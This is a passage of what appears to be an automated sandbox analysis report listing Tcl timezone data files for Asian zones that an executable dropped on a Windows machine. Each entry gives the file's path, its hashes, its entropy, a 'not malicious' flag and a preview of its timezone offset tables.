Encrypted:	false
SSDEEP:	12:MBp525mdHjPH+8mA6/y4wMJSQi3MYVKOXzHBD:cQ5ejHtmA66zMJW3RtjHBD
MD5:	D7FAFCA28785B9D46377BB52681870FF
SHA1:	04318B42954B8F8D206706DB3F206569D35A37D1
SHA-256:	AF653558D09C3BF3DDF08779660A8E393BA7610E7B1812E6B4D679AD6A437FD8
SHA-512:	105A0D8B0F6DF207FEC2E412716C3BA55EE781AA58117CB3A8FD19271A00AF962C1B4E41EEBB2491218A203A1BAF49321C3CA7E27797990A0B5FFAA88B5CE2F4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Seoul) {. {-9223372036854775808 30472 0 LMT}. {-2524552072 30600 0 KST}. {-2053931400 32400 0 KST}. {-1325494800 30600 0 KST}. {-1199262600 32400 0 KST}. {-498128400 28800 0 KST}. {-303984000 32400 1 KDT}. {-293533200 28800 0 KST}. {-264931200 30600 0 KST}. {-39515400 32400 0 KST}. {547570800 36000 1 KDT}. {560872800 32400 0 KST}. {579020400 36000 1 KDT}. {592322400 32400 0 KST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Shanghai Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	626
Entropy (8bit):	4.195217162473369
Encrypted:	false
SSDEEP:	12:MBp52vEmdHrXAwOW5zq/XVucq/GrNkq/HxJ2Qzq/hSaq/5Mq/xssjq/Xwq/4N:cQ8e7AwO+q/Xbq/Ckq/Hx4Qzq/hLq/Cc
MD5:	801AC98AD16AAB728F1037423A8E46C7
SHA1:	5B16F976EFD571C57CB9BE58B896B63A05C32715
SHA-256:	7FA5002B8BAA9A5DA9A842B74AFADC18C118031E74999ABEA1B7B9DAA095C317
SHA-512:	42A3EEB86A88CC38E5DA08E3FF24E4D3767769B0A73043A6AC81792F5C88E631AD7399F5B3CC3DC8E3AADE99EBBB190C982640B6459FC1804C10CCC44EABA823
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Shanghai) {. {-9223372036854775808 29157 0 LMT}. {-1325491557 28800 0 CST}. {-933494400 32400 1 CDT}. {-923130000 28800 0 CST}. {-908784000 32400 1 CDT}. {-891594000 28800 0 CST}. {-662716800 28800 0 CST}. {515520000 32400 1 CDT}. {527007600 28800 0 CST}. {545155200 32400 1 CDT}. {558457200 28800 0 CST}. {576604800 32400 1 CDT}. {589906800 28800 0 CST}. {608659200 32400 1 CDT}. {621961200 28800 0 CST}. {640108800 32400 1 CDT}. {653410800 28800 0 CST}. {671558400 32400 1 CDT}. {684860400 28800 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Singapore Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	386
Entropy (8bit):	4.499763562586137
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKfbdJm2OHxdPmIWOb/qgOMesF3His0dqgs8kvmQCIqgMQiI/0SGibL:MBp52nbdJmdHDPxDTNF+8tuQ90SrL
MD5:	72F394A6DB71E5E22742EFE4B2A3FE30
SHA1:	2BEAAE84CA2F2725C1A37139C312E56285339561
SHA-256:	B26FC478C496F512E21A6B81CDBFDB437E60F042AE49FFB701647DA2432B5DAA
SHA-512:	27D62AC711656D3D1E6BDDB428C764ECCFF7C6CF5D284096A931EDFE9EF5590D6832F669B0FEB9582FF413E77A0B6385227781A4C2BFC089986A29168FD313FD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Singapore) {. {-9223372036854775808 24925 0 LMT}. {-2177477725 24925 0 SMT}. {-2038200925 25200 0 MALT}. {-1167634800 26400 1 MALST}. {-1073028000 26400 0 MALT}. {-894180000 27000 0 MALT}. {-879665400 32400 0 JST}. {-767005200 27000 0 MALT}. {-138785400 27000 0 SGT}. {378664200 28800 0 SGT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Taipei Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1297
Entropy (8bit):	3.9799801552882723
Encrypted:	false
SSDEEP:	24:cQXbe9ZEq/9cq/9mvTq/KSq/LPq/wO3q/uq/PC9q/hq/Rq/Gq/fq/Aq/Vtyq/fQV:5XwB/d/Mvm/K/W/Ta/1/V/Y/o/d/y/Dg
MD5:	37310BB804FE2EC539C463BECA2B7058
SHA1:	70FE3249B844101FB3ADE6D2649D42193C6831EA
SHA-256:	F3EFBDAC3106359BC02AB30C09D8AAE2FF5E2341A28F493451B68D238757A3AA
SHA-512:	90574B08520F9897CD209DB959606E9ABE0362E5F36A5B86F2134842919B7529A7914C05EDE48FA9934E8C0D970D944724A044A035983C7CAB588889A7750E68
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Taipei) {. {-9223372036854775808 29160 0 LMT}. {-2335248360 28800 0 CST}. {-778579200 32400 1 CDT}. {-765363600 28800 0 CST}. {-747043200 32400 1 CDT}. {-733827600 28800 0 CST}. {-715507200 32400 1 CDT}. {-702291600 28800 0 CST}. {-683884800 32400 1 CDT}. {-670669200 28800 0 CST}. {-652348800 32400 1 CDT}. {-639133200 28800 0 CST}. {-620812800 32400 1 CDT}. {-607597200 28800 0 CST}. {-589276800 32400 1 CDT}. {-576061200 28800 0 CST}. {-562924800 32400 1 CDT}. {-541760400 28800 0 CST}. {-528710400 32400 1 CDT}. {-510224400 28800 0 CST}. {-497174400 32400 1 CDT}. {-478688400 28800 0 CST}. {-465638400 32400 1 CDT}. {-449830800 28800 0 CST}. {-434016000 32400 1 CDT}. {-418208400 28800 0 CST}. {-402480000 32400 1 CDT}. {-386672400 28800 0 CST}. {-370944000 32400 1 CDT}. {-355136400 28800 0 CST}. {-339408000 32400 1 CDT}. {-323600400 28

C:\Users\user\Desktop\tcl\tzdata\Asia\Tashkent Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.052115079834951
Encrypted:	false
SSDEEP:	24:cQZerHqbDfHFCZaqAHDggMBj945uZYQT2TXTxPc:5tPqxNpybVPc
MD5:	F2EE272A80F47B5AEB99CE2563B9CCCB
SHA1:	29D455D504BD5EEFFD265ED1CBE22B55918D62D9
SHA-256:	480AFDD80AAAA98964904130362BDB7CBA8429980290D79E2CBBE433A47A6BCC
SHA-512:	3D55CBC240E0355454A94B3290EB0E7AE533A97928C4E8E745EA67B4D2A5E354231BBBF970A5A46379AFD214F9E08E389AE766CC80654BFA7FE05295E84F7105
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tashkent) {. {-9223372036854775808 16632 0 LMT}. {-1441168632 18000 0 TAST}. {-1247547600 21600 0 TAST}. {354909600 25200 1 TASST}. {370717200 21600 0 TAST}. {386445600 25200 1 TASST}. {402253200 21600 0 TAST}. {417981600 25200 1 TASST}. {433789200 21600 0 TAST}. {449604000 25200 1 TASST}. {465336000 21600 0 TAST}. {481060800 25200 1 TASST}. {496785600 21600 0 TAST}. {512510400 25200 1 TASST}. {528235200 21600 0 TAST}. {543960000 25200 1 TASST}. {559684800 21600 0 TAST}. {575409600 25200 1 TASST}. {591134400 21600 0 TAST}. {606859200 25200 1 TASST}. {622584000 21600 0 TAST}. {638308800 25200 1 TASST}. {654638400 21600 0 TAST}. {670363200 18000 0 TAST}. {670366800 21600 1 TASST}. {683665200 21600 0 UZST}. {686091600 18000 0 UZT}. {694206000 18000 0 UZT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Tbilisi Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	3.9020577686652143
Encrypted:	false
SSDEEP:	24:cQyGemHxNm5aCkbPcXsXZUzJJu8ZmFebPR4c9alNkA/tbd8ttF6E39Uf1IUMc9UJ:5P5Tt5imFTN9VsZ7QZsKen
MD5:	AF05A16CF2B18ABB9CAA489368D00CB4
SHA1:	D761E7C0ED43BD46AA15569BF25BC6DFADFB0965
SHA-256:	5E9A39EFCDEF92BCDD05B9B0DB6A0701DF549D301B5BC3D53123DAE4E12C60CD
SHA-512:	998B94646D2566E30A86B29DE7D95F8AE5376E8118049EAB6837BE6A3126693721D69FA93913C942F5D48EBCF8122530B87C01705E57A25C73D6A091BC0B8CBE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tbilisi) {. {-9223372036854775808 10756 0 LMT}. {-2840151556 10756 0 TBMT}. {-1441162756 10800 0 TBIT}. {-405140400 14400 0 TBIT}. {354916800 18000 1 TBIST}. {370724400 14400 0 TBIT}. {386452800 18000 1 TBIST}. {402260400 14400 0 TBIT}. {417988800 18000 1 TBIST}. {433796400 14400 0 TBIT}. {449611200 18000 1 TBIST}. {465343200 14400 0 TBIT}. {481068000 18000 1 TBIST}. {496792800 14400 0 TBIT}. {512517600 18000 1 TBIST}. {528242400 14400 0 TBIT}. {543967200 18000 1 TBIST}. {559692000 14400 0 TBIT}. {575416800 18000 1 TBIST}. {591141600 14400 0 TBIT}. {606866400 18000 1 TBIST}. {622591200 14400 0 TBIT}. {638316000 18000 1 TBIST}. {654645600 14400 0 TBIT}. {670370400 14400 1 TBIST}. {671140800 14400 0 GEST}. {686098800 10800 0 GET}. {694213200 10800 0 GET}. {701816400 14400 1 GEST}. {717537600 10800 0 GET}. {733266000 14400 1 GEST}. {

C:\Users\user\Desktop\tcl\tzdata\Asia\Tehran Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3084
Entropy (8bit):	3.8446147411925486
Encrypted:	false
SSDEEP:	96:+oDm0LvKjM7z5/PwPHoHsWLYR7BsE8dySscPWQNgqRf9RP2x8O2J024ptlxP/XF5:+oC0LvKjcz5/POHCsWL87BsE8dyjcPWf
MD5:	DAA3AB1A5C0FAF5DED242E1DC4E5E5B7
SHA1:	07EAC7A67E0B7B2B6F69063BB8F82C2392A6E306
SHA-256:	5E138AAE70A3E9E8FBB3B6CC5425984D90D4A1C630CF9A889771E02DC6DFB265
SHA-512:	8902EE1F8A2C9A71B255B61C14D4BDE06E230B8E489560725F4DDE9739F0581FFA0057783944C511A16FC92F905F32242530E983AFD232A6052073ADD40B8753
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tehran) {. {-9223372036854775808 12344 0 LMT}. {-1704165944 12344 0 TMT}. {-757394744 12600 0 IRST}. {247177800 14400 0 IRST}. {259272000 18000 1 IRDT}. {277758000 14400 0 IRST}. {283982400 12600 0 IRST}. {290809800 16200 1 IRDT}. {306531000 12600 0 IRST}. {322432200 16200 1 IRDT}. {338499000 12600 0 IRST}. {673216200 16200 1 IRDT}. {685481400 12600 0 IRST}. {701209800 16200 1 IRDT}. {717103800 12600 0 IRST}. {732745800 16200 1 IRDT}. {748639800 12600 0 IRST}. {764281800 16200 1 IRDT}. {780175800 12600 0 IRST}. {795817800 16200 1 IRDT}. {811711800 12600 0 IRST}. {827353800 16200 1 IRDT}. {843247800 12600 0 IRST}. {858976200 16200 1 IRDT}. {874870200 12600 0 IRST}. {890512200 16200 1 IRDT}. {906406200 12600 0 IRST}. {922048200 16200 1 IRDT}. {937942200 12600 0 IRST}. {953584200 16200 1 IRDT}. {969478200 12600 0 IRST}. {985206600 16

C:\Users\user\Desktop\tcl\tzdata\Asia\Tel_Aviv Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.82789113675599
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq85zFFwVAIgN0AzFzt2WFK+TT52WFKYzFp:SlSWB9IZaM3yZbwVAIgCAb2wKsswKY7
MD5:	D044282CC9B9F531D8136612B4AA938D
SHA1:	5FD01E48BFFC2B54BBA48926EFD2137A91B57E0F
SHA-256:	FE57D86184A7F4A64F3555DE3F4463531A86BB18F124534F17B09FAB825F83B4
SHA-512:	DBBA54D68F33E51D51E816D79D83B61490BD31262DFF6037C0834BADA48CBC02F4281203D7212EDF6D96F7FF1EF3843299698BF0DFE10B5F1383AA504594505A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Jerusalem)]} {. LoadTimeZoneFile Asia/Jerusalem.}.set TZData(:Asia/Tel_Aviv) $TZData(:Asia/Jerusalem).

C:\Users\user\Desktop\tcl\tzdata\Asia\Thimbu Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	171
Entropy (8bit):	4.858169634371472
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8kNZ4pVAIgNqFNzO62WFK9Z752WFKvNZvn:SlSWB9IZaM3ykZ4pVAIgc3K62wKf12wc
MD5:	B678D97B4E6E6112299746833C06C70B
SHA1:	A49BD45DB59BDD3B7BF9159699272389E8EF77AC
SHA-256:	6AEAE87CAD7FE358A5A1BABE6C0244A3F89403FC64C5AA19E1FFDEDCEB6CF57B
SHA-512:	BEA10EAE5941E027D8FE9E5D5C03FAE5DCFEF7603088E71CA7CCD0461851E175AE1CC7592DFBEC63F91D840E4E0AA04B54549EB71303666E6EA16AFFF6EDA058
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Thimphu)]} {. LoadTimeZoneFile Asia/Thimphu.}.set TZData(:Asia/Thimbu) $TZData(:Asia/Thimphu).

C:\Users\user\Desktop\tcl\tzdata\Asia\Thimphu Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	171
Entropy (8bit):	4.8942281798484615
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKvNZLXGm2OHEQUTFnvSVaJKuc/vhGFDV9gmZVFvbv:SlSWB9X52wKVZCm2OHEfnjKuc/JG1V9l
MD5:	F11F6E49B655045210CBC9B97BE8BD32
SHA1:	B4ED9F32D9D18FC247E80AF2D19D2B7AFF58E23F
SHA-256:	FFD5F8C9FF0FE1FF191C35A1910EE39FFD0BC0DCBE045D4651745E9AB175EBD5
SHA-512:	4095C531BF55F7424E01A2A6259F5CECD063CE4DBC5C4830E1AD663BA57B6E7852FDAFD560C599F3E6DB650B0A7E8E3DB8D7985E6CE59DDB30C9B267E21AF2B5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Thimphu) {. {-9223372036854775808 21516 0 LMT}. {-706341516 19800 0 IST}. {560025000 21600 0 BTT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Tokyo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	434
Entropy (8bit):	4.348313926107011
Encrypted:	false
SSDEEP:	12:MBp52XmdHOx5PAfvzRSbL7Kzb674ybFj7azoheja:cQXeOPAfb0vGzu0y5G+eja
MD5:	E157D3653BB1E32EA2C5CE40D8DF3F46
SHA1:	40934505C8852D943D8BB302DFE332331FCAD71C
SHA-256:	AE87FB9907DFE028DE7D472B4DD488BE65511110FCE72CF6665D6EA5AC8772C9
SHA-512:	E3E6ECA25F3154EAECD0F4F9550F90700E9E4CEE0ABB0532574501D69C3564F0461CAAEFC89E1B316272CE0EDB0317CDC50A7E7BE9D38DDDD9028BBDCC2E9E02
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tokyo) {. {-9223372036854775808 33539 0 LMT}. {-2587712400 32400 0 JST}. {-2335251600 32400 0 CJT}. {-1009875600 32400 0 JST}. {-683794800 36000 1 JDT}. {-672393600 32400 0 JST}. {-654764400 36000 1 JDT}. {-640944000 32400 0 JST}. {-620290800 36000 1 JDT}. {-609494400 32400 0 JST}. {-588841200 36000 1 JDT}. {-578044800 32400 0 JST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Ujung_Pandang Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.8489855608543575
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8pYFwVAIgNzB0L2WFKPQOrFJ4WFKvn:SlSWB9IZaM3yWFwVAIg8L2wKPQOrFJ4H
MD5:	AF91CF42CFBA12F55AF3E6D26A71946D
SHA1:	673AC77D4E5B6ED7CE8AE67975372462F6AF870B
SHA-256:	D9BCAE393D4B9EE5F308FA0C26A7A6BCE716E77DB056E75A3B39B33A227760C8
SHA-512:	1FD61EA39FF08428486E07AF4404CEA67ACCCB600F11BA74B340A4F663EB8221BC7BF84AE677566F7DDEC0CB42F1946614CD11A9CD7824E0D6CAA804DF0EF514
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Makassar)]} {. LoadTimeZoneFile Asia/Makassar.}.set TZData(:Asia/Ujung_Pandang) $TZData(:Asia/Makassar).

C:\Users\user\Desktop\tcl\tzdata\Asia\Ulaanbaatar Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1487
Entropy (8bit):	4.023186631224087
Encrypted:	false
SSDEEP:	24:cQlTer96UWdKSWdW6zWdQmjWdxtKWdP8zWdIjWdcWdxwWdIWdwxzWddDWd1WdkAJ:569YKVzkQmUF7IUPxjLwOm+kA1sdSkB2
MD5:	DCCA58912445C53230464E3EA373CE15
SHA1:	9105885A954EC79C1C9965EE7BDCF2D35F6F4CAE
SHA-256:	CAFFFC8B561FB0003F12545E878144D5EC74056DC330BB41D1DEACA6C7DA2682
SHA-512:	DA609A7E9FCC25B9342E4F9327973F9D70C5857DDBF8C072D3848E36183E2654A6592452B0F0B39009BD9AD6B3C33DE7EE64C441F93E8A6ACD6AF4B37861FCC7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ulaanbaatar) {. {-9223372036854775808 25652 0 LMT}. {-2032931252 25200 0 ULAT}. {252435600 28800 0 ULAT}. {417974400 32400 1 ULAST}. {433782000 28800 0 ULAT}. {449596800 32400 1 ULAST}. {465318000 28800 0 ULAT}. {481046400 32400 1 ULAST}. {496767600 28800 0 ULAT}. {512496000 32400 1 ULAST}. {528217200 28800 0 ULAT}. {543945600 32400 1 ULAST}. {559666800 28800 0 ULAT}. {575395200 32400 1 ULAST}. {591116400 28800 0 ULAT}. {606844800 32400 1 ULAST}. {622566000 28800 0 ULAT}. {638294400 32400 1 ULAST}. {654620400 28800 0 ULAT}. {670348800 32400 1 ULAST}. {686070000 28800 0 ULAT}. {701798400 32400 1 ULAST}. {717519600 28800 0 ULAT}. {733248000 32400 1 ULAST}. {748969200 28800 0 ULAT}. {764697600 32400 1 ULAST}. {780418800 28800 0 ULAT}. {796147200 32400 1 ULAST}. {811868400 28800 0 ULAT}. {828201600 32400 1 ULAST}. {843922800 28800 0 ULAT

C:\Users\user\Desktop\tcl\tzdata\Asia\Ulan_Bator Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	187
Entropy (8bit):	4.675919405724711
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8TcXHVAIgNrfcXKxL2WFKhrMEBQWFKucXu:SlSWB9IZaM3yIVAIg7xL2wKhrMEewKI
MD5:	73C6A7BC088A3CD92CAC2F8B019994A0
SHA1:	74D5DCE1100F6C97DFCFAD5EFC310196F03ABED5
SHA-256:	8F075ACF5FF86E5CDE63E178F7FCB692C209B6023C80157A2ABF6826AE63C6C3
SHA-512:	4EAD916D2251CF3A9B336448B467282C251EE5D98299334F365711CCA8CAF9CA83600503A3346AEC9DFA9E9AF064BA6DEF570BABCC48AE5EB954DBF574A769B2
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ulaanbaatar)]} {. LoadTimeZoneFile Asia/Ulaanbaatar.}.set TZData(:Asia/Ulan_Bator) $TZData(:Asia/Ulaanbaatar).

C:\Users\user\Desktop\tcl\tzdata\Asia\Urumqi Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	508
Entropy (8bit):	4.264258436616557
Encrypted:	false
SSDEEP:	12:MBp52bCmdH8PXA00Nkq/HxJ2Qzq/hSaq/5Mq/xssjq/Xwq/4N:cQme8APkq/Hx4Qzq/hLq/Cq/xrq/Aq/2
MD5:	116E0F5F275C03961F3AF9E4C33B2AAE
SHA1:	0F4D2592ED55AC752942EE4156721205B1C74CE8
SHA-256:	BBC43C63AC8EE5C7747CBD29A0095197AE0C8F56686F7F7D36213B447D2237F4
SHA-512:	E5192F238324C31C2033CD949A706C6AA9055F43A73BAB29E55AC612411FC361D5AEEEF25EC8509BD764D8F4DFB09C33283CD04D9805F5217A535DFB99E92C60
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Urumqi) {. {-9223372036854775808 21020 0 LMT}. {-1325483420 21600 0 URUT}. {325965600 28800 0 CST}. {515520000 32400 1 CDT}. {527007600 28800 0 CST}. {545155200 32400 1 CDT}. {558457200 28800 0 CST}. {576604800 32400 1 CDT}. {589906800 28800 0 CST}. {608659200 32400 1 CDT}. {621961200 28800 0 CST}. {640108800 32400 1 CDT}. {653410800 28800 0 CST}. {671558400 32400 1 CDT}. {684860400 28800 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Ust-Nera Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2059
Entropy (8bit):	3.9838295563097765
Encrypted:	false
SSDEEP:	24:cQueIlfuvhOCTi7ZXltAtwGpd296ymXPO9UHxQdCHt/CXHmW9YbcINu27:5YWvhBiR8ld296yKPO9UHj1UGWgc4uc
MD5:	83D3FF39432589F70EF6743CB122277E
SHA1:	2C45A061F43CA1189F3285410B3F133C6B3C4B90
SHA-256:	A0D355F49D896C6CD211425B8C68D8E2C2E85752814F939B212EB375B69DDCAE
SHA-512:	F20DFFADD1F70E0BCB05C2296FE2AAD23B508E41714D316F889FE68D7AAAAFE06D255AD12A1F908D5AD7F62AFBCA1CE838124BACB1CCCE4C4E5803031D6905FC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ust-Nera) {. {-9223372036854775808 34374 0 LMT}. {-1579426374 28800 0 YAKT}. {354898800 43200 0 MAGST}. {370699200 39600 0 MAGT}. {386427600 43200 1 MAGST}. {402235200 39600 0 MAGT}. {417963600 43200 1 MAGST}. {433771200 39600 0 MAGT}. {449586000 43200 1 MAGST}. {465318000 39600 0 MAGT}. {481042800 43200 1 MAGST}. {496767600 39600 0 MAGT}. {512492400 43200 1 MAGST}. {528217200 39600 0 MAGT}. {543942000 43200 1 MAGST}. {559666800 39600 0 MAGT}. {575391600 43200 1 MAGST}. {591116400 39600 0 MAGT}. {606841200 43200 1 MAGST}. {622566000 39600 0 MAGT}. {638290800 43200 1 MAGST}. {654620400 39600 0 MAGT}. {670345200 36000 0 MAGMMTT}. {670348800 39600 1 MAGST}. {686073600 36000 0 MAGT}. {695750400 39600 0 MAGMMTT}. {701784000 43200 1 MAGST}. {717505200 39600 0 MAGT}. {733244400 43200 1 MAGST}. {748969200 39600 0 MAGT}. {764694000 43200 1 MA

C:\Users\user\Desktop\tcl\tzdata\Asia\Vientiane Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	236
Entropy (8bit):	4.675818095739543
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKgTjEw/kXGm2OHBbpkevXUWXRzXRldFWCuGCNidF9ndVvC:SlSWB9X52wKgbm2OHQePLSCuGLQuGLn
MD5:	41A12EE51446B0735C94207FF5525939
SHA1:	9FF27C73C07A15D519F9AECBDE9FB131E93F0EDA
SHA-256:	82229C41047E7A82091C399163BFB6332F17A45EEDDF2AC43FF2DD0C069135FA
SHA-512:	7250D3EA7C283E38B169DF48355E6BDF76A6FEB20BCAA65574346089793921A8E5504E25D1603141DAF7331BEDD3DD4E2E071ADBB843321A00383A76D4653E8B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Vientiane) {. {-9223372036854775808 24624 0 LMT}. {-2005973424 25580 0 SMT}. {-1855983920 25200 0 ICT}. {-1819954800 28800 0 ICT}. {-1220428800 25200 0 ICT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Vladivostok Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2069
Entropy (8bit):	3.9484945601417767
Encrypted:	false
SSDEEP:	48:56BB/9YnvKCEzQX8NcD8AxwV47ruR/qRapveJj2iBjGEL4mGubhEZIIAs8:UBdunvTEz1NcD8AxwV47ruR/qRapWJjl
MD5:	640966A3C4CF46D17FE362D9187A32EB
SHA1:	AE613E32D98DC2A628379A6B6B8DCB8053AFEC95
SHA-256:	959DD1235F1BA163C5A9E0D7C9FF4393848BB31A374074BE3A055F5D8FB96B10
SHA-512:	87C05EAB2672C00F98F39C2CE8DDB66455B43F7F06217F43B184EF1C4521F2C6FDF9E32ACF7A75AC2D227695C29935D91F07D9A12D73AD005E670EC913A12016
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Vladivostok) {. {-9223372036854775808 31664 0 LMT}. {-1487321264 32400 0 VLAT}. {-1247562000 36000 0 VLAMMTT}. {354895200 39600 1 VLAST}. {370702800 36000 0 VLAT}. {386431200 39600 1 VLAST}. {402238800 36000 0 VLAT}. {417967200 39600 1 VLAST}. {433774800 36000 0 VLAT}. {449589600 39600 1 VLAST}. {465321600 36000 0 VLAT}. {481046400 39600 1 VLAST}. {496771200 36000 0 VLAT}. {512496000 39600 1 VLAST}. {528220800 36000 0 VLAT}. {543945600 39600 1 VLAST}. {559670400 36000 0 VLAT}. {575395200 39600 1 VLAST}. {591120000 36000 0 VLAT}. {606844800 39600 1 VLAST}. {622569600 36000 0 VLAT}. {638294400 39600 1 VLAST}. {654624000 36000 0 VLAT}. {670348800 32400 0 VLAMMTST}. {670352400 36000 1 VLASST}. {686077200 32400 0 VLAST}. {695754000 36000 0 VLAMMTT}. {701787600 39600 1 VLAST}. {717508800 36000 0 VLAT}. {733248000 39600 1 VLAST}. {748972800

C:\Users\user\Desktop\tcl\tzdata\Asia\Yakutsk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2062
Entropy (8bit):	3.9472668883209154
Encrypted:	false
SSDEEP:	24:cQVe25Q6QzVLNoIKtyDYzj7QBLxUDZEAznMkoNiLWk7F0i2zdNIzQu3T0JchwzN7:5+ZaPG2RxLk3Isfr7jrhDbT
MD5:	FD3CC8820706882E6A431144D69BD3F7
SHA1:	C9045321811685439931A70926E20C14D81DD0EC
SHA-256:	88A1705570645EB06CC0A9247679EAC112DE02FD8804BDE6EAEC39230A6E7571
SHA-512:	E96BA60D778F7355CC536296148BA73791DD1171AED828C5A3572F63DC9AB13A11727729FF26C16560D1530A6E68A536CDF1B1897D12BFE8E269B2BBD87A0886
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yakutsk) {. {-9223372036854775808 31120 0 LMT}. {-1579423120 28800 0 YAKT}. {-1247558400 32400 0 YAKMMTT}. {354898800 36000 1 YAKST}. {370706400 32400 0 YAKT}. {386434800 36000 1 YAKST}. {402242400 32400 0 YAKT}. {417970800 36000 1 YAKST}. {433778400 32400 0 YAKT}. {449593200 36000 1 YAKST}. {465325200 32400 0 YAKT}. {481050000 36000 1 YAKST}. {496774800 32400 0 YAKT}. {512499600 36000 1 YAKST}. {528224400 32400 0 YAKT}. {543949200 36000 1 YAKST}. {559674000 32400 0 YAKT}. {575398800 36000 1 YAKST}. {591123600 32400 0 YAKT}. {606848400 36000 1 YAKST}. {622573200 32400 0 YAKT}. {638298000 36000 1 YAKST}. {654627600 32400 0 YAKT}. {670352400 28800 0 YAKMMTT}. {670356000 32400 1 YAKST}. {686080800 28800 0 YAKT}. {695757600 32400 0 YAKMMTT}. {701791200 36000 1 YAKST}. {717512400 32400 0 YAKT}. {733251600 36000 1 YAKST}. {748976400 32400

C:\Users\user\Desktop\tcl\tzdata\Asia\Yekaterinburg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2068
Entropy (8bit):	3.969651550786474
Encrypted:	false
SSDEEP:	24:cQiceiQd0hnwbdYIgOdY3IToxB3CjWODWgYrPmv+ZBUBUucoX:5iQhnwCI1SIQ/g2USJY
MD5:	2480E7AF59077CF8F0F888FB9093BAB8
SHA1:	F7680343EE6CF049FD14B728718181C298210C1C
SHA-256:	44D7E2EDA03D526345CAB53F1CE8D8FD85BBE21182A1D2903F796856A090C2D2
SHA-512:	2AB44808C08F3DB75843167E4580D7ACA0CDA747819BD167BBADB64DD4BC58D9F2F0BB1BAC25966A01146DE84F1219A02E09CA5A59AB05489D9BBDBE61F90859
Malicious:	false
